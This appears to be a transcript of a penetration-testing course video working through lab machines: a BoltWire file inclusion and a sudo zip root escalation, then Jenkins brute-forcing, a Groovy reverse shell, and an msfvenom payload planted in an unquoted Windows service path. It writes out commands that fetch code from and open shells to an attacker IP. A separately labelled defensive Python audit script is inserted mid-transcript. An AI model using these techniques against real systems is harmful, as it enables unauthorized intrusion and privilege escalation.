there. Nothing's there. Bolt user, first it says, source site... we get a customization extension PHP, I don't know if there's anything in there, you could open that, doesn't look like it's going to go anywhere. Next we go to app, kind of come through here, and this is where we find a directory. And I think I said in one of the past videos that it's kind of realistic, I have seen this actually on a pentest before, where you come across a directory and this directory listing can be a finding. One time I literally came in here and the first thing sitting at the top of the directory was a SQL database with all the passwords and information in here. So looks like there's a bolt database in here, though the size is zero. I clicked through here earlier trying to click around, see if I could find anything. cache is interesting, but config would probably be more interesting, especially a config.yaml file, so I went ahead and just downloaded that, and then I have it stored here. I'm going to go ahead and just open that up, and I encourage you to do the same, open with Mousepad, open with whatever you like. Here you can see that it says hey, the username is bolt and the password is I love java. So I'm going to copy this. We don't know where this works, if this works, if this pays off for anything anywhere, but we're going to save this information kind of in our back pocket. So I'm going to do a new tab in here and just paste that, because that's some information that we got.

So the other side of things is that we also have a BoltWire application, and we can come in here and look around. It looks like there's a registration page; I might be able to register, like, hacker and password hacker. Come in here, and it doesn't look like it's letting us do anything else. So we're clicking around, we've got some search features, it doesn't look like it's doing anything, print can print some information on the site. So it's best to click around, see if there's anything of interest in here, but I'm not seeing anything at
this point in time of interest. So as of right now I'm curious as to this BoltWire, if there's any vulnerabilities that exist. So we can go out to Google, I actually have Google open right here, and we can just say like boltwire exploit and see what comes up. Now there's one from 2020, there's one from 2012. I'm going to use the more recent one, this local file inclusion. We could also search this on our Kali machine, by the way. We can go in and just do like a... let's see, we can do a searchsploit and just do boltwire and see what comes back. And you can see that all that shows up are multiple cross-site scripting, which cross-site scripting is not going to have any effect for us, like putting cross-site scripting here isn't going to do anything on a box like this. Unless, from a CTF standpoint, there is somebody mimicking a user going in and actually navigating the website, there's no use for even attacking cross-site scripting. That's not to say that this is not a great vulnerability, and this is something that you would see in the real world, you absolutely do, but we attack real users with this, that's part of it, because you store cross-site scripting, or you store JavaScript, and you attack users. We're not attacking any users, we're just attacking this box at this time.

So what we're going to do then is probably really focus on this local file inclusion. So let's take a look at it and open this up. We'll talk about local file inclusion, what that is, what it might be. So really quickly, local file inclusion allows us to potentially expose files that are running on a server, and this can lead to information disclosure, as you're going to see here, remote code execution, cross-site scripting, there's a lot of things that it can do. So basically what's happening is it is accepting this path here as input; it's a coding error on the development side, so we're able to input this, and what we're doing with ../../ ... imagine you're in a
Linux machine, we're literally just saying hey, I want to go back as far as possible to a base directory and then /etc/passwd. Okay, so this could be as many directories as needed, you could throw in 10 of these and it might work, and then we're trying to get the /etc/passwd because this will allow us to see who's on the machine. Now, if this is running as a root user, then guess what, we can run this as /etc/shadow and go grab the hash, and maybe we have even more sensitive information. But this attack by itself is pretty cool, and it's not seen in the wild as much, but it is definitely out there, so something we test for on every web application. So what we're going to do here is we're looking for local files. Remember, this is local file inclusion, so no remote files, which is a different type of attack: LFI here, not RFI. So it looks like we're using action.search, and then this attack frame here. So I'm going to go ahead and just copy this, I'll show you why, because I was looking at the application and you can see that here's the index.php?p=welcome. In here it's very similar, p=action.search, so this is on the search feature, it looks like it's happening, or on the action parameter. So we're going to go ahead and paste that in here. Make sure you've created an account, by the way; if you do not have an account created for this then it is not going to work. I don't know if that says that in here, that you need to be authenticated or not... oh it does, being authenticated, so if you're not authenticated it will not work. So you can come in here, just come over here and paste, cross your fingers, and it works. So one thing I want to try real quick is like /etc/shadow. Nothing, it was worth a shot, you never know. So we're not running as a user that can read the /etc/shadow file. So in this instance we're just looking at a user that can read the /etc/passwd. That's okay, we're not a high level user here. And what we can do is we scroll down to the bottom, we
always know root's at the top, scroll down to the bottom to see who your users might be, and out of anything that stands out in here there's only one user, and that is our friend JP, who looks like his name is Jean-Paul. So I think we have a user here. So this explains why the jp didn't work for us before when we tried logging in on the machine, because jeanpaul was the user that we had and he wasn't on that machine; so we were looking for jeanpaul. So now we found a little bit more information and we can tie this all together, hopefully, and actually exploit this machine. So I'm going to go back... where was the mount that I had... I'm going to go back in here and try ssh-ing again with this file and do a jeanpaul@, and it's asking for a password, a key passphrase. Okay, so there are two options that we can do here. Option number one is you are capable of brute forcing this key, id_rsa; John the Ripper can take this and push it through. The issue is, if the password doesn't show up in your wordlist, or the password is too strong for example, then it's not going to work. We also have some information that we found before that might work out for us. We already know that Jean-Paul, or JP, said in his to-do that he is a lover of what? Java. And he comes in here and we have a password saying I love java. Now my hunch is this probably doesn't show up in rockyou, and we can do a quick check on that actually. So let's just do a cat /usr/share/wordlists/rockyou like this, and you can just watch, and then we're just going to grep on this password. It doesn't show up. Like, whereas if you wanted to grep on like pasta, you could see all the different times pasta shows up in this wordlist. So if we were to run rockyou against this with the wordlist, it wouldn't have worked. Now if we had a really good wordlist possibly it shows up, but we already know a little bit about him. We're going to go ahead and try pasting that in, and of course it works, Jean-Paul really loves Java. So jeanpaul@dev has logged in and now
we are we are the low level user so do a quick ls print working directory we're in his home folder there's nothing here some things that i like to do immediately history check okay it looks like somebody cleared out the history somebody ran a pseudo dash ellen here exited um sudo dash l is the second check that i like to do or even first check like do because it tells us what we can run as sudo without a password okay so sudo remember is what we can run as elevated privileges so in this instance we can run the zip feature with with no password so we can literally run sudo zip and should work okay so it's not requiring a password awesome issue here how how can we take sudo zip and abuse that feature for us to be able to escalate into root that is the question if we have a no password which this comes up a lot in boxes like this like ctf style boxes if we have a no password how can we do this so we need to go take a look at that we come over here i got a site for you go out to the google machine okay and you're going to type in gtfo bin just like that it's really gtfo bins but we took what showed up first okay gtfo bins great website let's make it bigger great great website you come in here you can look for the different type of escalations that you want we have a pseudo escalation okay pseudoescalation and we come in here we say okay we've got sudo and then we're looking for zip we can come we can type in zip in the search bar but we also have zip right here so if we want to do a pseudo zip we go into zip look for sudo and it says here's how you use sudo as a zip in order to get a um in order to get root privileges okay and so it says in here if the binary is allowed to run as a super user by sudo it does not drop the elevated privileges and may be used to access the file system escalate or maintain privileged access it's telling us what it's doing all we have to do here is copy this come over paste this okay come back copy this this should drop us into a shell this 
should drop us into a shell let's see what happens all right we have been dropped into a shell here as sudo we dropped into a shell so with that if we type in id we are now root why because sudo runs elevated we said okay as elevated user we want to go ahead and drop into a shell here we did this now we can go cd to root ls cat out our flag congrats on rooting this box and that's it so hopefully that was informative for you this was a little bit on the i would say easier side of the machines we're trying to go in order of difficulty uh this one is something that you you get a few different options for you it shows you how to mount it shows you how to enumerate multiple web directories and really tie a bunch of information together which is nice and then you get to see a classic pseudo no password escalation this time using zip but if you see in the gtfo bins when we went back and just highlighted sudo there are a lot of escalations if pseudo privileges are enabled in order to get into to go from low level to root so it's quite fun and quite common by the way so that's it for this video i will go ahead and see you in the next one on to the next machine which is butler now butler was created by joe helly aka the mayor thank you so much joe for creating this machine for us and this machine is going to be a windows based machine that is going to allow us to explore privilege escalation since when we first used blue blue went right to root for us so this one's going to give us some experience with privilege escalation now i have this accounts.txt file open just to show you that the administrator password for this one's a little bit different than the other windows machine this file is included in your your download so if you downloaded this you've installed it you should have found the accounts that way you can go and get the ip address that was pulled from this machine so with that out of the way i went ahead and ran nmap again similar process now here we have 7680 
open and 8080 open. I'm going to go ahead, and you can ignore that for now, I'm going to go ahead and go out to the website, 192.168.138.138, and we're going to see if it would help if I put 8080 on the end of it; we're going to see what's there. Okay, all that's here is a login page for Jenkins. So we don't have much here yet. There are a few things that we can do here: we can try to do some brute forcing, we can look at directory busting, we could try to do a view page source real quick and see if there's any information in here that might indicate what version we're running and see if there's anything in here that we can get maybe an exploit off of, and really there's not going to be much. We could go to Google and do a quick "jenkins exploit" and see if we can find any sort of Jenkins exploits, and there's this here about attacking Jenkins, there's one here about attacking Jenkins, this one has remote code execution, and we've got to click through these and see what we're looking at. So it looks like in 2015 Jenkins had some deserialization attacks; 2018 had authentication bypassing; and it looks like, let's see, we've got check script remote code execution. There are a lot of different attacks in here: there's some password spraying that you can do against this, which we'll talk about here in a minute, dumping secrets, Groovy scripts, reverse shells with Groovy. Okay, so there's quite a bit in here. This one is a little bit, let's see if it's the same or not. This is saying hey, here's how you get code execution; there's three ways to get code execution, which ideally we want. We could do some brute forcing here, but I'm going to show you a way to do brute forcing without having to do this. We can do some remote code execution, and it shows hey, there's a few different ways to do it; in this instance we're going to need authentication. There's no way around this for using Jenkins, we need authentication to get in here. So it's pretty neat, they show you a few different ways to get this exploit, and everything's pointing back to Groovy, or it looks like there's a PowerShell way of doing it, which is neat. This article here tells you hey, when you're logged in, you can log in and it shows you how to attack this. This looks a little bit older, so there are ways around this, and we could do some research into this to see okay, how do we exploit Jenkins? All signs so far are really pointing to authenticated attacks. There are some here that are older that look like they're bypassing authentication; just to save time and skip ahead, we're going to go ahead and avoid those, though it's not out of the realm of possibility that you explore those, go down these rabbit holes, check it out, see if there's any sort of attack that you can exploit here. So our main focus is: how do we log into this application? We haven't found any sort of version information, which is unfortunate. The other thing that we can do is we can go to Google and we could say "jenkins default password", and it says the default password is admin:password, which is what's created the very first time you log in. I think it asks you to change it once you log in, though I am not 100% confident on that. And we can come in here and try admin, password, and we're going to see that doesn't work. Unfortunately we don't have default credentials here. So we do have the possibility of doing some brute force directory busting on this; maybe there's a configuration file or something sitting on the back end that we can get access to. I'm going to tell you, just to save time, that is not the case, though if you're thinking through that methodology or that mindset, that's fine, I think that's okay. The other option is this port here, 7680. We could try connecting to this; you can use netcat, you can use telnet, there are options here. For example, you could try telnetting, but you'd have to do apt install telnet because it doesn't come by default anymore, and then you would just go telnet, IP address 138.138, and then that port number, which would be 7680, and you can see what's listening on there. This is an odd port; it's trying, it's not connecting. It's one of those weird ones that you don't really see that often, and I'm telling you from my experience, I don't see that often. You can go out and Google hey, what does this port do? You could also go and say hey, I know this port's open, so I'm going to go ahead and just try 7680 here; that's going to stall out, it's not a web address either. So we're running out of options on how to actually connect to that. That could be a false positive that it came back on as well; we're not sure, because we're not getting any actual connection into that machine. So with that being said, we need to brute force Jenkins. Now you saw Metasploit had a module, somebody showed that in one of these; we're going to do the Burp Suite method, that's my favorite go-to, and I'll show you the Burp Suite method. If you want to play around with some of these other methods, like what's shown in here, sorry, I'll make this bigger, but what's shown in here, feel free to go use this and Metasploit and see if you can brute force passwords, usernames, etc. But from here what we're going to do is we're going to use Burp Suite. So I'm going to use a tool called FoxyProxy. Since we're in 2021 I'm going to go ahead and show you how to install this, just to get this up and running. If you just type in foxy proxy, literally go to the first link you get, with Standard, go in here, hit install. Mine's already installed so it's going to ask me to remove it; all you've got to do is install it. It should show up right here in the corner, little fox. You go to Options for your first time setting it up, and in here all you want to do is hit Add; and then I'm going to cancel this, let's edit this so you can see what my settings are. I just named it burp, 127.0.0.1, our localhost, and our port of 8080.
What this does is: we used Burp Suite once in the course and we had to go in and change our settings and our preferences, and come in here; this just does it for us automatically with, like, the flip of a switch. So when we open up Burp Suite, let's go ahead and do that; you can just type in burp up at the top and open up Burp Suite. So we're going to use this proxy, right, we're going to proxy through this. I'm going to cancel any requests for updates, we're just going to use what's in here; this is 2021.2.1, which is new enough for me. I've made my font size really big, so yours might look a little bit different; this is just for video recording purposes. But in here we have a proxy, okay, this is what we're going to be listening on, we're intercepting some traffic. We showed this a little bit in the enumeration section, but here you can see 127.0.0.1:8080 is where the traffic is flowing through, and I'm going to go ahead and intercept traffic. So I'm going to come in here and I'm going to say admin, password on this attempt, which I know is not going to work, but we have the traffic now intercepted hopefully in our Burp Suite. Maybe if I actually turned this on it would work; let's try admin, password, hit enter. Okay, now it comes up, so you can see the request comes through. In this Inspector we're getting a POST request; we're trying to pass this password through, admin, password, sign-in form. What I'm going to do is, we can send this to Repeater; I'll send it to Repeater first, then I'm going to send this to Intruder. So just right-click; you can do Ctrl+R or Ctrl+I, both work: Ctrl+R to send to Repeater, Ctrl+I to send to Intruder. But in this instance we can just push this request, hit Send, and this will just say hey, 302 Found; you can follow the redirection, and it's going to say 401 Unauthorized. All right, so that's one thing. We could see in here that the Set-Cookie comes through, remember-me equals, and there's nothing in here, so that could be something to look forward to a little bit later. But what we want to do is we want to come in and we could technically brute force: we could be like password, password1, go send that one, and keep coming through until we can find a redirection and find an actual login. Doing this with Repeater will take forever. Good thing is we have something called Intruder. So if you come in here and you go into the Positions tab right here, go ahead and hit Clear. What we're going to do is set a couple of positions: we're going to come in here and we're going to say okay, admin, I see you, I'm going to go ahead and say Add; double-click on admin, hit Add, double-click on password, hit Add. We are basically setting up our parameters, or our variables, that we're going to use. So we're going to perform an attack where we give usernames and we give passwords, and it's going to try those in combination. So really, when we use multiple facets here, we're either going to be using Pitchfork or Cluster bomb. So Pitchfork is great for what is credential stuffing, which we're going to be trying: hey, I know this user has this password, so we'll say admin has the password "password", and we may have found that in a breach; so we'll try admin to password, and then we'll try the next user with that password, so it's one to one. Now Battering ram, or sorry, Cluster bomb is: I'm going to try every single user with every single password in the list. So if I've got five users and ten different passwords, that's going to be fifty different attempts, because it's going to try user 1 with all ten passwords, user 2 with all ten passwords, and so forth. So we're going to use a Cluster bomb attack, because we have no idea what the username or the password is. Now, in order to save time, I'm going to just type in a few different payloads here. Realistically we would guess some different usernames that would go in here, like for example admin, administrator, jenkins; if we knew, like, an IT person or somebody who might be running this, we might put in their name. But in this instance we might just want to run with these three, and then on a bad password list we might just go copy, like, the worst 100 passwords or worst 500 passwords and then just hit paste and paste it in here. In this instance I'm going to type out some bad passwords, so maybe password, jenkins, how about Password with a capital P, Jenkins with a capital J, you know, something like password1, etc. Now we have three different users, five different passwords, fifteen different attacks; three times five is fifteen. So we're going to try admin first with all these passwords, then it's going to go through and try administrator with all these passwords, then it's going to try jenkins with all these passwords. So we're going to hit Start attack, and what's going to happen is it's going to start pushing through, and we have to be very cognizant and watch this, and watch for any sort of changes that might happen in this. It's very, very subtle. When we're looking through this, if there's a status change, sometimes these will go like 401, or we could follow the redirection in the settings, by the way, we could select that. There's also advanced stuff that we'll get into, like we can use grep to look for different changes in here; we'll talk about that a little bit later, but we also cover that in the External Pentest Playbook course, because that is something that we do when we're doing password spraying attacks. Here in this instance we are looking for subtle changes, like the length that is here. If you notice, everything's 302, so there's no difference in status changes, there's no difference in error codes or anything. What we're seeing though is 318, 318, 318, 318.
All of a sudden there's a 314 on jenkins, jenkins. What changes here, what is the response that changes compared to this? Okay, here we get a JSESSIONID cookie, where here before we did not have that; here we get a cookie. And then what changes here? We already have a JSESSIONID cookie, and we're getting a login error because we have more data that we're storing in here; we're already authenticated. So now it's gone from 318 down to 314 for this one request, into a bunch of 408s to the 409 range. So this one small, tiny little request here, this little length difference, could be the indicator that there's something different. So you have to really scroll through this, use your eagle eyes, and make sure that you are looking through this with a fine-tooth comb. Here I am seeing jenkins, jenkins as a valid login, and we're going to go attempt that. I'm going to turn this off; we're going to go attempt to log in with jenkins, jenkins, and hopefully we get in. Okay, we do get in. So from here we do have the ability to run code execution; let's see what they say. So we need to find a place to execute this code. This is okay; I've seen better write-ups on this, so going around and doing some research you will find places to execute code in here. If you go into Manage Jenkins, there should be a bunch of different tools that are in here. Scrolling through, there is a command line here that you can run from a shell, which seems pretty interesting; it's just getting into a shell on this machine from a script. There's also a Script Console here. The Script Console is interesting because it's in Groovy; we've seen Groovy a few times. You might even type something like "jenkins script console exploit", something like that, and you can see "exploiting Jenkins Groovy script console in multiple ways". So this is somebody that came in here and did this; another thing that you can just read through and see. They're using Metasploit; we can use manual methodology, which is right here, there's a GitHub reverse shell, which honestly, if you just go to Google and you just type in "groovy reverse shell", the first thing that comes up should be your ideal one, which looks like it's the same one they had too, but this is what I like to use. You can come in here, make this a little bit bigger, you can just go Raw, copy this, and then we'll paste it and we'll talk about it. So copy that, paste it in here. So we need to utilize this for a reverse shell. This is using cmd.exe to perform the reverse shell; it's giving the port of 8044. You can choose whatever port you want here, but I'm going to keep it the same, why not keep it simple. So I'm going to make this bigger: nc -nvlp 8044, we'll set up a listener on here. We have localhost; we're not running localhost, okay, we're going to give it 192.168.138.131, or whatever your attacker IP is; so whatever the IP of your Kali Linux machine is, this is what you want to get. So this is just a reverse shell; all it is is written in Groovy instead of the other ways that you've seen it so far. So it's going to reach out to us on this port, and when it reaches out to us it's going to execute cmd.exe; here's the whole process of that code. All we have to do is execute this, which I might need to make a little bit smaller to actually see; let's see, we'll just go all the way over to the right and I'll just run this. Okay, and it's stalling, which is usually a good sign, meaning that we are likely getting in, and we do have a shell here. So we are now, whoami, we are now butler on butler. We are not SYSTEM, we're not NT AUTHORITY\SYSTEM, so we need to take this a little bit further and see if we can elevate privileges. Now there are several tools and methods that we can utilize; we are going to look at a classic form of privilege escalation on this machine. If I were going through this machine, the first thing that I would do is I'd look at systeminfo. I would want to know what machine this is, what the build is. You can see we're running on Windows 10. If this was running on an older edition... this is a Windows 10 Enterprise, which is nice; we're running on Windows 10, so the chances of there being an exploit for this build may be pretty low. I would look at this build, see if there's anything there that we can use or abuse in order to get escalation, but the intended path on this, as of right now, is a different method. So we're going to look through that, and I'm going to show you kind of the basic enumeration process that we can use. Again, if you're curious about seeing this in way more detail, you are welcome to join us in the Windows Privilege Escalation course and go through this a little bit more. So with that out of the way, there is a tool out there called winPEAS. So I'm going to go back; I'm kind of already cheating and going ahead because I downloaded this earlier. But if you search winPEAS, remember linPEAS? This is the Windows version of linPEAS, so just go to the first thing that you see. Now in here, if you scroll down a little bit, they'll have different downloads, so we can go into the exe here, winPEASexe, and you'll see an sln; we don't want the sln, we just want to be able to download the latest. So go into download the latest version; we're not going to compile this, we're just going to trust what they've got. So come in here, download winPEASx64.exe right here. All right, I'll say okay on this because I want to show you again what I do. If you come into root and you open a new tab, make sure you move this. So I moved, I don't know if I actually downloaded it, let's see, winPEAS; I didn't download it, but I moved winPEAS, whatever it's called, winPEASx64.
Make sure you do that: move that into your transfer folder, or ensure that you're going to have it where you want to host it. I actually just moved it and I renamed it winpeas.exe, because it's a lot easier to just type that out on a machine, so a little bit of keeping it simple. So with that I'm going to go ahead and just do this, which is python3 -m, for module, http.server, and port 80. So we're going to host up this transfer folder in here. I'm going to go ahead and go to my shell, and I want to go to my user folder or somewhere that I can write. It looks like I'm in the Jenkins folder, but I like to go, first of all, cd C:\Users, actually cd C:\Users, do a dir in here. butler should have read access, or read/write access, so we're going to go there first. What we might do too is see if there's anything in here; like, we might look at, well, he's got some downloads in the Downloads folder. It looks like an indicator in here is looking at the different times; sometimes when you're doing these CTF machines, like, what was the last time this was updated, so there might be something in the Downloads folder that could be of interest. Like, cd Downloads, do a dir real quick; looks like Wise Care 365 was installed, who knows what that is. That could be something of value to us later, but that is information, it's just not exactly what we're looking for at this exact second. We can go around, maybe cd to the Desktop, see if there's anything there; nothing there either. Okay, so we just want to be able to put a file somewhere that's writable, so I'm going to put winPEAS here in butler's folder, just his base folder here for his user. And all we're going to do is use a tool called certutil to transfer this over. So certutil.exe, we're going to do a -urlcache like this, -f for file, and then we're going to grab 192.168.138.131/winpeas.exe; we're going to call it winpeas. Okay, we should do a dir and it should exist right here. So if you need a second to catch up, go ahead and catch up; otherwise we're going to go ahead and move on. So now we just run winpeas.exe, and special note: yours might not be in color. You can run this reg add command, or should be able to run this; I'm not sure as a lower-level user actually, so you might have to suffer through the first time with seeing it not in color, but just follow along on my screen if you can't run this reg add. But you're going to have to run this and then run this again; otherwise we're just going to kind of scroll through this. This is similar to what we saw with linPEAS: red means something we want to look at, and kind of scroll through. So we're just going to scroll through this; there's a lot of output on this machine. I'm looking for anything that quickly stands out for me. These protections enabled, they really don't matter to me at this moment; I'm looking for something that might just, like, hey, this immediately stands out. So it's giving us drive information; most of this is just disk enumeration at this point, nothing of value so far. It's looking up printers, telling us printers; it's looking up named pipes, which is fine. I'm going through; this is telling us explicit credential events, which are plain-text credentials if we have them; I'm not seeing anything here, so we'll scroll through these, keep going. Printing account logon events, these are just events again. winPEAS has gotten beefier over the years; it used to be pretty quick to scroll through. I'm going to actually cheat a little bit and scroll down. PowerShell script blocks, let's keep going here. Okay, users information: it's telling us the users on this machine, and again this is all different kinds of enumeration. Now the SeImpersonatePrivilege could be good for a potato attack, but that's a different type of attack; we're not looking for that at the moment, but that could be something, that's why it's highlighted in red, something we do cover in the escalation course. So it's telling us more about user accounts that are on this machine, any sort of RDP sessions that might exist, any sort of folders; heavy, heavy, heavy enumeration to scroll through. Okay, we're in process information; I'm going to skip past processes, I'm not too concerned about what processes are running, that could take a long time to scroll through. When we're doing privilege escalation we are looking for quick wins. So we've got some service information, and in here there are some... okay, something does show up, and this is all lighting up red. So I'm looking and reading through here: we have the ability to modify services, like we have the ability to modify jenkins.exe. Perhaps we can modify that and write a shell code here and get a shell; since we're running as this user, I'm not sure that that's going to run as administrator. It looks like file permissions here, we'd have to be able to hijack that binary. So I'm going to scroll through; again this is disabled, we might be able to enable this. VMware, I don't ever attack, I don't know if that's really truly an attack method, even though it shows up a lot. The other one that showed up that's interesting is here: we have this Wise Boot Assistant, which was that Wise Care that we saw downloaded. So that's of interest, because we did see that downloaded, we do see this running, and what's weird is, okay, it's running, it's auto-running, and it says no quotes and space detected. It said you can modify this service, all access, file permissions, is run as administrator. That's very, very interesting. So let's talk about what we're seeing, and I know this could be a little bit overwhelming, because this is just kind of throwing privilege escalation in your face from a Windows perspective, and that can get pretty messy pretty quick depending on what you're looking for. What we're looking at here, and why this is important, is we are looking at a privilege escalation that will allow us to get SYSTEM on this machine, and this is called
unquoted service paths. I'm going to show you what this looks like on the Windows machine, but basically what's happening is the service executable that is here, the service executable, it is located in a path that is not enclosed in quotes. Okay, so you see no quotes, and there's a space detected; so you see a space, you see a space. The issue here is that when Windows runs this, and it looks for this service when you start the service up, it's literally looking for every instance that exists before the space, and it's trying to add .exe. So it first tries C:\Program.exe, then C:\Program Files.exe, okay, it keeps going on; here Wise.exe, Wise Care.exe, okay. And what's happening is, I think my machine might have just shut down on me, I'm going to go ahead and turn this back on as I was going to show you. What's happening is we can take a malicious executable, basically malware, and we can upload it to this machine, place it in one of these folders. We don't have to overwrite this, by the way, not the BootTime.exe; we can literally just write something called Wise.exe, as long as we have permission to write into this folder we can do that, and then we can run it, and hopefully we can get a shell out of that, because the system is going down and it's looking for Wise.exe, and when it finds it, it will run that first, and then we're going to attack it based on this. So I want to show you really quick on the Windows side of things; of course I am locked out of the administrator account as well. Okay, so what I've done in here is I've gone out and I've looked for this service in regedit; you don't have to follow along, but this is in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services, and then the Wise Boot Assistant. When we say unquoted service path, if we look at this ImagePath here, there should be, to prevent this attack from happening, quotes around this. There are not quotes around this, so this is called an unquoted service path, meaning we're not taking the literal path of this; thus, when we run C:\Program Files (x86)\Wise all the way through for this BootTime, it's going to do those checks. Now I don't know if we have write permissions to the C:\Program Files folder as a user, but we certainly should have write permissions here, since we installed this, it looks like, as the user. So if we have write permissions to this Wise folder, we can go ahead and just drop a file in there called Wise.exe, and it will try to run Wise.exe in that folder. So it'll go C:\Program Files\Wise\Wise.exe, it's going to exploit this situation here, and hopefully we will get a shell out of this. So let's go ahead and give this a try. What I'm going to do is I'm going to scroll all the way down here and look at all this mess; there's a lot. Now there are other tools that could easily identify this, by the way. Like, this tool is probably the most comprehensive, and that's why I showed it to you, but there are tools called PowerUp which will do this, there are exploit checkers that will do this, there are other ways to run through machines like this and do escalation checks. I'm showing you probably the most popular tool, but it is the most comprehensive and it can be overwhelming, so please don't feel overwhelmed. You will, with practice and over time, learn how to decipher this, read through it really fast, and know kind of what you're looking for; train your eyes for those things. Again, this is just introductory, ground-level type stuff. So what we want to do is we want to generate some malware. I'm going to go ahead and stop sharing this folder real quick, because I'm going to put malware into this. So we're going to use msfvenom, and we're going to use this to generate some shellcode here. So we're going to do a payload of windows/x64/shell_reverse_tcp, and if you wanted to do this with Metasploit you could do Meterpreter, go down that path, etc. For this instance we're going to use no Metasploit, we're just going to do this all manually. We're going to give our listening host, which is us, 192.168.138.131; this is your attacker machine. We're going to give a listening port, I'm going to call this 7777, do a file type of exe, and output of wise.exe; you could also do this as Wise.exe just like that. All right, so we're going to go drop this, once it generates, into the Wise folder. So I'm going to go ahead and put this back up as a transfer, so my transfer folder is back up and running. I'm also going to open a new tab and I'm going to nc -nvlp, and we're going to listen on all sevens, because that's where we said that this is going to work. So we know this is 64-bit architecture; we saw that, by the way, when we were running systeminfo, we saw that this is Windows 10, 64-bit architecture, so this is all from our little bit of enumeration that we did. Going back to this machine, we need to go ahead and get into that folder, so that folder was in C:, so we're going to cd C:\, we're going to go ahead and do a quick dir, and it's easier for me to just copy like this and then do a cd, paste, like that, get you in there; cd into Wise, okay, and now we're in the folder that we want to be in. So if we type in dir, we've got Wise Care 365.
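As an added illustration that is not part of the course material, here is a small Python audit that reproduces the path-splitting described above: it lists the executables Windows would try for an unquoted ImagePath, flags the ones that land in a directory a low-privileged user can write to, and prints the sc config fix. The service entries, the Wise Care 365 install path, the run-as accounts and the writable-directory set are constructed for the example, and the service name WiseBootAssistant is assumed from the transcript.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class ServiceEntry:
    name: str          # key under HKLM\SYSTEM\CurrentControlSet\Services
    image_path: str    # raw ImagePath value, exactly as stored
    start_name: str    # account the service runs as


# Constructed entries mirroring the winPEAS finding on Butler; the exact
# install path and accounts are assumptions, not values from the machine.
WISE_PATH = r"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"

SERVICES = [
    ServiceEntry("WiseBootAssistant", WISE_PATH, "LocalSystem"),
    # unquoted, but the executable name has no space before it: safe
    ServiceEntry("NoSpaceSvc", r"C:\Windows\System32\svchost.exe -k netsvcs", "LocalSystem"),
    # spaces in the path, but properly quoted: safe
    ServiceEntry("GoodVendorSvc", r'"C:\Program Files\Good Vendor\svc.exe"', "LocalSystem"),
]

# Directories the unprivileged user can write to (constructed; on a real host
# you would establish this with icacls or Get-Acl).
WRITABLE_DIRS = {r"C:\Program Files (x86)\Wise", r"C:\Users\butler"}


def search_candidates(image_path: str) -> list[str]:
    """Executables the service control manager will look for, in order.
    A quoted path is taken literally. An unquoted path is tried one
    space-delimited prefix at a time with '.exe' appended, until a prefix
    that already ends in '.exe' (the real binary) is reached."""
    path = image_path.strip()
    if path.startswith('"'):
        return [path[1:].split('"', 1)[0]]
    tokens = path.split(" ")
    tried = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            tried.append(prefix)      # real binary found: search stops here
            break
        tried.append(prefix + ".exe")
    return tried


def hijack_points(image_path: str, writable_dirs) -> list[str]:
    """Decoy names tried before the real binary whose directory the
    unprivileged user can write to (the 'drop Wise.exe here' case)."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    candidates = search_candidates(image_path)
    return [c for c in candidates[:-1] if ntpath.dirname(c).lower() in writable]


def remediation(svc: ServiceEntry) -> str:
    """sc config command that wraps the ImagePath in quotes (assumes the
    value holds only the executable path, no arguments)."""
    exe = search_candidates(svc.image_path)[-1]
    return f'sc config {svc.name} binPath= "\\"{exe}\\""'


def audit(services, writable_dirs) -> list[dict]:
    """Return one finding per service whose ImagePath is unquoted and
    contains a space before the executable name."""
    findings = []
    for svc in services:
        candidates = search_candidates(svc.image_path)
        if len(candidates) < 2:
            continue          # quoted, or no space in the path: nothing to try
        findings.append({
            "service": svc.name,
            "runs_as": svc.start_name,
            "tried_first": candidates[:-1],
            "writable_hijack_points": hijack_points(svc.image_path, writable_dirs),
            "fix": remediation(svc),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SERVICES, WRITABLE_DIRS):
        print(f"[!] {f['service']} runs as {f['runs_as']}")
        for p in f["tried_first"]:
            mark = "  <- writable" if p in f["writable_hijack_points"] else ""
            print(f"    tries {p}{mark}")
        print(f"    fix: {f['fix']}")
```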
So we're going to put Wise in here, it's going to try to run Wise.exe and we should be good to go, so we'll see how this works. What we need to do is run certutil one more time, same way; we're going to use this to transfer a file over, which is nice: http://192.168.138.131/Wise.exe, and we're gonna call this Wise.exe, just like that. Hopefully it comes over. Do a dir. Okay, it's sitting in here, that's great. Now the question is, how do we run this? If we just do a .\ or if we just go Wise.exe, don't hit enter. If we do Wise.exe, that is going to run this as the regular user, it's going to run it as butler, you will pop a shell back here as butler and we will have gained no ground whatsoever. So what we need to do is we need to stop the service that's running. Now the service that's running is the Wise Boot Assistant, okay? We can query that to find that out. I'm just telling you how to do it, just a little bit easier; you can go google what the running service is called, you could look through winPEAS and it'll tell you as well. I'm just guiding you along, giving you a quick step ahead here. So we're going to do an sc stop on WiseBootAssistant, it's all one word like this. Okay, so it's saying STOP_PENDING, it's going to go ahead and stop that. We can do, I believe, sc query WiseBootAssistant, okay, and you can see that this is stopped. So now that it's stopped, what we're gonna do is we're going to start it. When we start it, it's going to execute as the system, it's going to run that shellcode as SYSTEM, and hopefully we get a shell back as SYSTEM. So you see the shell came through, we say whoami, nt authority\system, and that is it. So this is a very, very classic, absolutely classic way of exploiting a machine.

So looking through the printout of winPEAS again, there are other tools out there that do this, there's actually even a check that will do this from a one-liner, there are privilege escalation checklists and guides that you can go through, so when you get on a machine you say, hey, I'm going to check this first, then I'm going to check this next, and you go through the checklist and make sure you leave no stone unturned. You kind of get your low-hanging fruit, like you saw with the Linux: we'll check history first, because maybe there's a password stored in history, then we'll check sudo and see if we have any privileges, and kind of go down the easy list. Same thing with systeminfo: I want to see what the build is, if I can recognize the build, there's something there for trained eyes, and then kind of just go down the list as to what we need to do. Running winPEAS is something that we can execute fairly easily, run through it, same thing with PowerUp or other tools like that, and we can go through and find issues like this, and this one is a classic. If you do any CTF machines, I guarantee you will see this in the future. So this is a good one to show you as an example and build you up into privilege escalation and kind of get your feet wet in the game. So that's it for this machine, we're going to go ahead and move on to the next one.

